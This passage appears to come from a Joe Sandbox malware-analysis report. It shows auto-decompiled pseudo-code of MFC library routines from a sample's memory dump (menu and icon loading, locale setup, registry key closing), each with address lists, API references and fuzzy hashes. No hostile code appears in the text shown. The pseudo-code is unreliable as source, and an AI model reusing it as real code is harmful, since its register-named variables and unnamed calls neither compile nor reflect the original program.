						 *((intOrPtr*)(__ebp + 8)) = __ecx;
						 *((intOrPtr*)(__ebp - 4)) = 0;
						goto L23;
					case 6:
						__eax =  *__esi;
						__eax =  *((intOrPtr*)( *__esi + 0x9c))();
						__ebx = 0;
						__eflags =  *(__edi + 8);
						if( *(__edi + 8) == 0) {
							_push(0xffffffff);
							_push(0);
							__eflags = __eax;
							if(__eflags == 0) {
								_push(0xf10c);
							} else {
								_push(0xf10b);
							}
							__eax = E009B4535(__ebx, __edx, __edi, __esi, __eflags);
						}
						 *(__ebp - 0x10) = __ebx;
						__eflags = __esi[0x25] - __ebx;
						if(__eflags == 0) {
							__ecx = E009A6291(__eflags, 0x2c);
							 *((intOrPtr*)(__ebp + 8)) = __ecx;
							 *((intOrPtr*)(__ebp - 4)) = 1;
							L23:
							__eflags = __ecx - __ebx;
							if(__eflags == 0) {
								__eax = 0;
								__eflags = 0;
							} else {
								__eax = E009B2204(__ecx, __eflags);
							}
							__esi[0x25] = __eax;
							 *((intOrPtr*)(__eax + 0x14)) = 7;
						}
						goto L27;
					case 7:
						_t56 =  *__ecx;
						_t66 = _t65 + 0x28;
						_push(_t65 + 0x28);
						_push( *((intOrPtr*)(_t56 + 0xdc))());
						 *((intOrPtr*)(_t56 + 0xd0))();
						_t50 =  *((intOrPtr*)( *__ecx + 0x104))();
						_t72 = _t50;
						if(_t50 != 0) {
							goto L27;
						}
						goto L3;
				}
			}







      0x009b39fe
      0x009b3a05
      0x009b3a0a
      0x009b3a0c
      0x009b3a0f
      0x009b3a12
      0x009b3a1c
      0x009b3b7d
      0x009b3b85
      0x009b3b85
      0x009b3a22
      0x00000000
      0x009b3a50
      0x009b3a50
      0x009b3a5c
      0x009b3a5d
      0x009b3a5e
      0x009b3a5f
      0x009b3a6b
      0x009b3a6f
      0x009b3a6f
      0x009b3a77
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x009b3a85
      0x009b3a88
      0x009b3a8a
      0x009b3a8b
      0x009b3a91
      0x009b3a93
      0x009b3a99
      0x009b3a99
      0x00000000
      0x00000000
      0x009b3aa1
      0x009b3aa3
      0x009b3aa5
      0x009b3aa8
      0x009b3aab
      0x009b3aac
      0x009b3ab2
      0x009b3ab4
      0x009b3ab6
      0x009b3ab9
      0x009b3abf
      0x009b3ac1
      0x009b3ac3
      0x009b3ac3
      0x009b3ad6
      0x009b3adc
      0x009b3adc
      0x009b3a7d
      0x009b3a7d
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x009b3ae4
      0x009b3ae7
      0x009b3aeb
      0x00000000
      0x00000000
      0x009b3af6
      0x009b3af8
      0x009b3afe
      0x009b3b00
      0x009b3b03
      0x009b3b09
      0x00000000
      0x00000000
      0x009b3b13
      0x009b3b15
      0x009b3b18
      0x00000000
      0x00000000
      0x009b3b1d
      0x009b3b1f
      0x009b3b25
      0x009b3b27
      0x009b3b2a
      0x009b3b2c
      0x009b3b2e
      0x009b3b2f
      0x009b3b31
      0x009b3b3a
      0x009b3b33
      0x009b3b33
      0x009b3b33
      0x009b3b3f
      0x009b3b3f
      0x009b3b44
      0x009b3b47
      0x009b3b4d
      0x009b3b57
      0x009b3b59
      0x009b3b5c
      0x009b3b63
      0x009b3b63
      0x009b3b65
      0x009b3b6e
      0x009b3b6e
      0x009b3b67
      0x009b3b67
      0x009b3b67
      0x009b3b70
      0x009b3b76
      0x009b3b76
      0x00000000
      0x00000000
      0x009b3a29
      0x009b3a2b
      0x009b3a2e
      0x009b3a35
      0x009b3a38
      0x009b3a42
      0x009b3a48
      0x009b3a4a
      0x00000000
      0x00000000
      0x00000000
      0x00000000

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: H_prolog3MessageSend
      • String ID:
      • API String ID: 936991600-0
      • Opcode ID: 05ea707ffef993ea73edd3467da10068f85062f1b225b90c4b4aa8c421b75f57
      • Instruction ID: db0ddda1975576bd534e9265d5160d069a5beecfec69cfcb0aac1e812e7c3dc6
      • Opcode Fuzzy Hash: 05ea707ffef993ea73edd3467da10068f85062f1b225b90c4b4aa8c421b75f57
      • Instruction Fuzzy Hash: A7416C70601215DFDB20DF74CA85BBAB7E8FF48364F10893DE69A9B295CB709A40CB50
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A927E Relevance: 3.1, APIs: 2, Instructions: 88windowCOMMON
      Download Yara Rule
      C-Code - Quality: 75%
      			E009A927E(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t30;
				intOrPtr _t34;
				struct HMENU__* _t40;
				void* _t48;
				intOrPtr _t52;
				signed short _t64;
				intOrPtr* _t67;
				void* _t69;
				void* _t70;

				_t62 = __edx;
				_t51 = __ebx;
				_push(8);
				E00AAD232(0xacd197, __ebx, __edi, __esi);
				_t67 = __ecx;
				_t64 =  *(_t70 + 8);
				 *(__ecx + 0xc4) = _t64;
				_t30 = E009B9D52();
				_t54 = _t70 + 8;
				E009A5D70(_t70 + 8, __edx, _t30);
				 *(_t70 - 4) =  *(_t70 - 4) & 0x00000000;
				_push(_t64);
				if(E009BE51C() != 0) {
					_t54 = _t70 + 8;
					_t48 = E009A8DDD(_t70 + 8, __edx, _t32, _t64);
					_t73 = _t48;
					if(_t48 != 0) {
						E009BE527(__ebx, _t67 + 0xe4,  *(_t70 + 8), 0, 0xa);
					}
				}
				E009AFF05(_t51, _t54, _t64, _t67, _t73, 8);
				_t34 = E009A70AD(_t51, _t67, _t73,  *((intOrPtr*)(_t70 + 0xc)), _t64); // executed
				 *((intOrPtr*)(_t70 - 0x10)) = _t34;
				_t12 = E009A6C6C( *((intOrPtr*)(_t67 + 0xe4)) - 0x10) + 0x10; // 0x10
				_t52 = _t12;
				 *((intOrPtr*)(_t70 - 0x14)) = _t52;
				_push( *((intOrPtr*)(_t70 + 0x14)));
				_push(0);
				_t65 = _t64 & 0x0000ffff;
				_push(_t64 & 0x0000ffff);
				_push( *((intOrPtr*)(_t70 + 0x10)));
				_push(0xd07d70);
				_push( *((intOrPtr*)(_t70 + 0xc)));
				 *(_t70 - 4) = 1;
				_push(_t52);
				_push( *((intOrPtr*)(_t70 - 0x10)));
				if( *((intOrPtr*)( *_t67 + 0x160))() != 0) {
					__eflags =  *((intOrPtr*)(_t67 + 0xf4)) - 1;
					if(__eflags != 0) {
						_t40 =  *(_t67 + 0xf8);
					} else {
						_t40 = GetMenu( *(_t67 + 0x20));
					}
					_t58 = _t67;
					 *(_t67 + 0x7c) = _t40;
					E009A6CCC(_t67, __eflags, _t65);
					__eflags =  *((intOrPtr*)(_t70 + 0x14));
					if( *((intOrPtr*)(_t70 + 0x14)) == 0) {
						E009AD893(_t52, _t58, _t62,  *(_t67 + 0x20), 0x364, 0, 0, 1, 1);
					}
					_t69 = 1;
				} else {
					_t69 = 0;
				}
				_t20 = _t52 - 0x10; // 0x0
				E009A5510(_t20, _t62);
				E009A5510( *(_t70 + 8) + 0xfffffff0, _t62);
				return E00AAD30A(_t69);
			}












      0x009a927e
      0x009a927e
      0x009a927e
      0x009a9285
      0x009a928a
      0x009a928c
      0x009a928f
      0x009a9295
      0x009a929b
      0x009a929e
      0x009a92a3
      0x009a92a7
      0x009a92af
      0x009a92b3
      0x009a92b6
      0x009a92bb
      0x009a92bd
      0x009a92cd
      0x009a92cd
      0x009a92bd
      0x009a92d4
      0x009a92df
      0x009a92e4
      0x009a92f6
      0x009a92f6
      0x009a92fa
      0x009a92fd
      0x009a9302
      0x009a9304
      0x009a9307
      0x009a9308
      0x009a930d
      0x009a9312
      0x009a9315
      0x009a9319
      0x009a931a
      0x009a9325
      0x009a9346
      0x009a934d
      0x009a935a
      0x009a934f
      0x009a9352
      0x009a9352
      0x009a9361
      0x009a9363
      0x009a9366
      0x009a936d
      0x009a9370
      0x009a9380
      0x009a9380
      0x009a9387
      0x009a9327
      0x009a9327
      0x009a9327
      0x009a9329
      0x009a932c
      0x009a9337
      0x009a9343

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: H_prolog3Menu
      • String ID:
      • API String ID: 3706238695-0
      • Opcode ID: badd85872d8b1b6197697d97c3df53125e276502a3892252314d638c70ecc4f1
      • Instruction ID: 3f9dafae764ec1d56de04c8e7aa271213f0086cf8f6e2b15c6c9a9f971e18535
      • Opcode Fuzzy Hash: badd85872d8b1b6197697d97c3df53125e276502a3892252314d638c70ecc4f1
      • Instruction Fuzzy Hash: 6F319C30600204ABCF25AF60CD45FAF7BB8FF86710F004819F996AB2D1DB719900CAA0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A950A Relevance: 3.1, APIs: 2, Instructions: 70windowCOMMON
      Download Yara Rule
      C-Code - Quality: 96%
      			E009A950A(void* __ebx, intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20, CHAR* _a24, intOrPtr _a28, intOrPtr _a32) {
				struct HMENU__* _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t28;
				intOrPtr* _t30;
				intOrPtr _t33;
				intOrPtr _t35;
				struct HMENU__* _t39;
				void* _t42;
				intOrPtr _t48;
				void* _t51;
				intOrPtr _t52;
				intOrPtr* _t58;

				_t51 = __edx;
				_t42 = __ebx;
				_push(__ecx);
				_t58 = __ecx;
				_v8 = 0;
				_t60 = _a24;
				if(_a24 == 0) {
					L4:
					E009A6000(_t51, 0, _a8);
					_t28 = _a20;
					__eflags = _t28;
					if(_t28 != 0) {
						_a24 =  *((intOrPtr*)(_t28 + 0x20));
					} else {
						_a24 = 0;
					}
					_t30 = _a16;
					_t48 =  *((intOrPtr*)(_t30 + 4));
					_t52 =  *_t30;
					_t33 =  *((intOrPtr*)( *_t58 + 0x5c))(_a28, _a4, _a8, _a12, _t52, _t48,  *((intOrPtr*)(_t30 + 8)) - _t52,  *((intOrPtr*)(_t30 + 0xc)) - _t48, _a24, _v8, _a32, _t42);
					__eflags = _t33;
					if(_t33 != 0) {
						_t35 = 1;
						__eflags = 1;
						goto L11;
					} else {
						__eflags = _v8 - _t33;
						if(_v8 != _t33) {
							DestroyMenu(_v8);
						}
						L3:
						_t35 = 0;
						L11:
						return _t35;
					}
				}
				_t39 = LoadMenuA( *(E009BD77F(__ebx, 0, __ecx, _t60) + 0xc), _a24); // executed
				_v8 = _t39;
				if(_t39 != 0) {
					goto L4;
				}
				 *((intOrPtr*)( *_t58 + 0x120))();
				goto L3;
			}

















      0x009a950a
      0x009a950a
      0x009a950f
      0x009a9514
      0x009a9516
      0x009a9519
      0x009a951c
      0x009a9545
      0x009a954e
      0x009a9553
      0x009a9556
      0x009a9558
      0x009a9562
      0x009a955a
      0x009a955a
      0x009a955a
      0x009a9565
      0x009a9568
      0x009a956b
      0x009a9595
      0x009a9599
      0x009a959b
      0x009a95af
      0x009a95af
      0x00000000
      0x009a959d
      0x009a959d
      0x009a95a0
      0x009a95a5
      0x009a95a5
      0x009a9541
      0x009a9541
      0x009a95b0
      0x009a95b3
      0x009a95b3
      0x009a959b
      0x009a952a
      0x009a9530
      0x009a9535
      0x00000000
      0x00000000
      0x009a953b
      0x00000000

      APIs
      • LoadMenuA.USER32 ref: 009A952A
      • DestroyMenu.USER32(?,?,?,?,?,?,?,?,?), ref: 009A95A5
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Menu$DestroyLoad
      • String ID:
      • API String ID: 588275208-0
      • Opcode ID: 185c19a3b9f80282d6b5a520c40f1048dff05faa5d228711c70e6b6c82bee5ba
      • Instruction ID: d3ed96a611804a053a65f33101966a502a5e6e6fd2e4df920732394d919c1114
      • Opcode Fuzzy Hash: 185c19a3b9f80282d6b5a520c40f1048dff05faa5d228711c70e6b6c82bee5ba
      • Instruction Fuzzy Hash: F4213875A00109EFCF02CFA4C9499AA7BBAFF89350B158465FC1A97221D631DD11DF90
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A5F60 Relevance: 3.1, APIs: 2, Instructions: 66COMMON
      Download Yara Rule
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: _memmove_s
      • String ID:
      • API String ID: 800865076-0
      • Opcode ID: 899305a09f2aaaa60e55b22c885d172a88485a877e9f2e2e6f32a9f4ee571c15
      • Instruction ID: 5cd7f3749e19854f0809e7acb536cfe29aa11efa7beec5055659a4a9dfcdd342
      • Opcode Fuzzy Hash: 899305a09f2aaaa60e55b22c885d172a88485a877e9f2e2e6f32a9f4ee571c15
      • Instruction Fuzzy Hash: 77110132701914AFDB04EF5CDD88F6EB7D9EF8A320B12815AF8049F219C630AC408BD0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A19D0 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E009A19D0(void* __ecx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t20;
				intOrPtr _t21;
				intOrPtr _t24;
				void* _t25;
				intOrPtr* _t27;
				intOrPtr _t30;
				void* _t32;
				void* _t34;
				void* _t37;

				_t37 = __eflags;
				_t34 = __ecx;
				 *((intOrPtr*)(__ecx + 0x30)) = 0;
				 *((intOrPtr*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0x201;
				 *((intOrPtr*)(__ecx + 0x18)) = 6;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				 *((intOrPtr*)(__ecx + 0x20)) = 0;
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				 *((intOrPtr*)(__ecx + 0x28)) = 0;
				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
				E009A18A0(__ecx, 0, 0);
				_t20 = E009A6291(_t37, 4);
				_t27 = _t20;
				_t38 = _t27;
				if(_t27 == 0) {
					 *((intOrPtr*)(_t34 + 0x30)) = 0;
					return _t20;
				} else {
					_t21 = E00AC5DF9(_t27, _t32, 0, _t34, _t38); // executed
					 *_t27 = _t21;
					_v8 = E00AC5BB8();
					E00AC5AED( &_v12, 0);
					_t30 = _v8;
					_t24 =  *((intOrPtr*)(_t30 + 4));
					if(_t24 < 0xffffffff) {
						 *((intOrPtr*)(_t30 + 4)) = _t24 + 1;
					}
					_t25 = E00AC5B15( &_v12);
					 *((intOrPtr*)(_t34 + 0x30)) = _t27;
					return _t25;
				}
			}


















      0x009a19d0
      0x009a19d8
      0x009a19df
      0x009a19e2
      0x009a19e5
      0x009a19e8
      0x009a19ef
      0x009a19f6
      0x009a19f9
      0x009a19fc
      0x009a19ff
      0x009a1a02
      0x009a1a05
      0x009a1a0c
      0x009a1a11
      0x009a1a16
      0x009a1a18
      0x009a1a53
      0x009a1a5c
      0x009a1a1a
      0x009a1a1a
      0x009a1a1f
      0x009a1a2a
      0x009a1a2d
      0x009a1a32
      0x009a1a35
      0x009a1a3b
      0x009a1a3e
      0x009a1a3e
      0x009a1a44
      0x009a1a4a
      0x009a1a52
      0x009a1a52

      APIs
        • Part of subcall function 009A18A0: __CxxThrowException@8.LIBCMT ref: 009A18C4
        • Part of subcall function 009A18A0: std::exception::exception.LIBCMT ref: 009A18E8
        • Part of subcall function 009A18A0: __CxxThrowException@8.LIBCMT ref: 009A1903
        • Part of subcall function 009A18A0: std::exception::exception.LIBCMT ref: 009A1922
        • Part of subcall function 009A18A0: __CxxThrowException@8.LIBCMT ref: 009A193D
        • Part of subcall function 009A18A0: std::exception::exception.LIBCMT ref: 009A1957
        • Part of subcall function 009A18A0: __CxxThrowException@8.LIBCMT ref: 009A1972
        • Part of subcall function 009A6291: _malloc.LIBCMT ref: 009A62AF
      • std::locale::_Init.LIBCPMT ref: 009A1A1A
        • Part of subcall function 00AC5DF9: __EH_prolog3.LIBCMT ref: 00AC5E00
        • Part of subcall function 00AC5DF9: std::_Lockit::_Lockit.LIBCPMT ref: 00AC5E16
        • Part of subcall function 00AC5DF9: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00AC5E38
        • Part of subcall function 00AC5DF9: std::locale::_Setgloballocale.LIBCPMT ref: 00AC5E42
        • Part of subcall function 00AC5DF9: _Yarn.LIBCPMT ref: 00AC5E58
      • std::_Lockit::_Lockit.LIBCPMT ref: 009A1A2D
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Exception@8Throw$std::exception::exceptionstd::locale::_$LockitLockit::_std::_$H_prolog3InitLocimpLocimp::_SetgloballocaleYarn_malloc
      • String ID:
      • API String ID: 353226162-0
      • Opcode ID: b41ac85784164fafa2ba71051aa93f12f6736699d303da25341d44fb00076347
      • Instruction ID: 50467cf807bfc864f34efc7416b2b55437a62a62dd19c9c45e19b00b089fc756
      • Opcode Fuzzy Hash: b41ac85784164fafa2ba71051aa93f12f6736699d303da25341d44fb00076347
      • Instruction Fuzzy Hash: 4A114CB19007049BC7209FAAD585A5AFBF8FF91320B10066FE85A83651D7B1B9458A91
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A70AD Relevance: 3.1, APIs: 2, Instructions: 54windowCOMMON
      Download Yara Rule
      C-Code - Quality: 83%
      			E009A70AD(void* __ebx, intOrPtr* __ecx, void* __eflags, intOrPtr _a4, signed short _a8) {
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v44;
				intOrPtr _v52;
				intOrPtr _v60;
				char _v92;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HICON__* _t18;
				void* _t25;
				void* _t35;
				struct HICON__* _t36;
				intOrPtr* _t37;

				_t37 = __ecx;
				_t18 = LoadIconW( *(E009BD77F(__ebx, _t35, __ecx, __eflags) + 0xc), _a8 & 0x0000ffff); // executed
				_t36 = _t18;
				if(_t36 == 0) {
					L5:
					__eflags = 0;
					return 0;
				}
				E00AAB3F0( &_v92, 0, 0x30);
				_v60 = _a4;
				 *((intOrPtr*)( *_t37 + 0x64))( &_v92);
				_t43 = _v52;
				if(_v52 == 0) {
					goto L5;
				}
				_t25 = E009BD77F(__ebx, _t36, _t37, _t43);
				_push( &_v44);
				_push(_v52);
				_push( *((intOrPtr*)(_t25 + 8)));
				if(E009A6ACA( &_v44, _t37, _t43) == 0) {
					goto L5;
				}
				_t45 = _v24 - _t36;
				if(_v24 == _t36) {
					goto L5;
				}
				return E009AFC32( &_v44, _t45, _v44, _v20, _v16, _t36);
			}


















      0x009a70b7
      0x009a70c7
      0x009a70cd
      0x009a70d1
      0x009a712c
      0x009a712c
      0x00000000
      0x009a712c
      0x009a70db
      0x009a70e9
      0x009a70f1
      0x009a70f4
      0x009a70f8
      0x00000000
      0x00000000
      0x009a70fa
      0x009a7105
      0x009a7106
      0x009a7109
      0x009a7114
      0x00000000
      0x00000000
      0x009a7116
      0x009a7119
      0x00000000
      0x00000000
      0x00000000

      APIs
      • LoadIconW.USER32(?,?), ref: 009A70C7
      • _memset.LIBCMT ref: 009A70DB
        • Part of subcall function 009A6ACA: ActivateActCtx.KERNEL32(?,00000030,00B0B708,00000010,009AFBC2,?,?,?,00000030,009AFF00,?,?,009B0017,?,AfxFrameOrView100s,00007A02), ref: 009A6AEA
        • Part of subcall function 009AFC32: __snwprintf_s.LIBCMT ref: 009AFC7D
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: ActivateIconLoad__snwprintf_s_memset
      • String ID:
      • API String ID: 4120747014-0
      • Opcode ID: 15d0f76c5136660d3f1e4cb429f35a47675c0438284871d2fc580fad8e98b578
      • Instruction ID: 8414e9420607638457b04fa168f0939d1f1d97d7f92a7d4a72df69f73336b680
      • Opcode Fuzzy Hash: 15d0f76c5136660d3f1e4cb429f35a47675c0438284871d2fc580fad8e98b578
      • Instruction Fuzzy Hash: 8C118E72904108ABCB10ABE8DC4AEEEFBF9EF89314F140025F900A7151EB70D945CBE0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B33F8 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
      Download Yara Rule
      APIs
        • Part of subcall function 009B333D: RegCloseKey.KERNELBASE(?), ref: 009B33E2
        • Part of subcall function 009B333D: RegCloseKey.ADVAPI32(?), ref: 009B33EC
      • RegCloseKey.ADVAPI32(00000000), ref: 009B3443
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Close
      • String ID:
      • API String ID: 3535843008-0
      • Opcode ID: 1b948344179fbf947ba7e585ada3dee68d8ed923f4ac769cfaf578dd6fc2c29c
      • Instruction ID: ec5e31be41cc2b5d50f4f3da25b6855958e3a4bd00dfc41987fcaf0c88c81f2d
      • Opcode Fuzzy Hash: 1b948344179fbf947ba7e585ada3dee68d8ed923f4ac769cfaf578dd6fc2c29c
      • Instruction Fuzzy Hash: 82F01D76501028FB8B22DB91DD49CEF7F6DEF89BB0750C026F90696111DA749B01DBB1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009AB5AF Relevance: 3.0, APIs: 2, Instructions: 35COMMON
      Download Yara Rule
      C-Code - Quality: 79%
      			E009AB5AF(void* __ecx, void* __esi, void* __eflags) {
				void* _t23;
				struct HWND__* _t24;
				struct HWND__* _t26;
				void* _t28;
				void* _t30;
				void* _t33;
				void* _t34;

				_t34 = __eflags;
				E00AAD340(_t28, _t30, __esi);
				 *((intOrPtr*)(_t33 - 0x20)) = 0;
				_t23 = E009BD77F(_t28, _t30, 0, _t34);
				__imp__ActivateActCtx( *((intOrPtr*)(_t23 + 0x80)), _t33 - 0x20, 0xb0bab0, 0x10);
				 *(_t33 - 0x1c) = 0;
